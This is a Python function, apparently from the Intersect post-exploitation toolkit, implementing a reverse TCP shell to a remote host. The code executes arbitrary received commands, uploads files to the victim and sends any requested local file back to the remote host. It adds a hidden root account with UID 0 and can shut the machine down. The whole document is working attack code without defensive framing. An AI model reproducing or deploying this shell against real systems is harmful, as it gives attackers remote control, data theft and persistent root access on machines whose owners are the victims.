
def rshell():
    '''
    @description: Opens a reverse TCP shell to a remote host. Interactive shell with download/upload and remote Intersect module execution.
    @author: ohdae [bindshell@live.com]
    @short: reverse TCP shell
    '''
    socksize = 4096
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
    try:
        conn.connect((RHOST, RPORT))
        conn.send("[+] New connection established!")
        conn.send("\nIntersect "+str(os.getcwd())+" => ")
    except:
        print("[!] Connection error!")
        sys.exit(2)

    while True:
        cmd = conn.recv(socksize)
        proc = Popen(cmd,
             shell=True,
             stdout=PIPE,
             stderr=PIPE,
             stdin=PIPE,
             )
        stdout, stderr = proc.communicate()
        if cmd.startswith('cd'):
            destination = cmd[3:].replace('\n','')
            if os.path.isdir(destination):
                os.chdir(destination)
                conn.send("\nIntersect "+str(os.getcwd())+" => ")
            else:
                conn.send("[!] Directory does not exist") 
                conn.send("\nIntersect "+str(os.getcwd())+" => ")

        elif cmd.startswith(':addroot'):
            strip = cmd.split(" ")
            acct = strip[1]
            os.system("/usr/sbin/useradd -M -o -s /bin/bash -u 0 -l " + acct)
            conn.send("[+] Root account " + acct + " has been created.")

        elif cmd.startswith(':upload'):
            getname = cmd.split(" ")
            rem_file = getname[1]
            filename = rem_file.replace("/","_")
            filedata = conn.recv(socksize)
            newfile = file(filename, "wb")
            newfile.write(filedata)
            newfile.close()
            if os.path.isfile(filename):
                conn.send("[+] File upload complete!")
            if not os.path.isfile(filename):
                conn.send("[!] File upload failed! Please try again")

        elif cmd.startswith(':download'):
            getname = cmd.split(" ")
            loc_file = getname[1]
            if os.path.exists(loc_file) is True:
                sendfile = open(loc_file, "r")
                filedata = sendfile.read()
                sendfile.close()
                conn.sendall(filedata)
            else:
                conn.send("[+] File not found!")

        elif cmd.startswith(":reboot"):
            conn.send("[!] Server system is going down for a reboot!")
            os.system("shutdown -h now")

        elif cmd == (":mods"):
            conn.send(str(modList))
            conn.send("\nIntersect "+str(os.getcwd())+" => ")

        elif cmd.startswith(":exec"):
            pass

        elif cmd == (':killme'):
            conn.send("[!] Shutting down shell!\n")
            conn.close()
            sys.exit(0)

        elif proc:
            conn.sendall( stdout )
            conn.send("\nIntersect "+str(os.getcwd())+" => ")



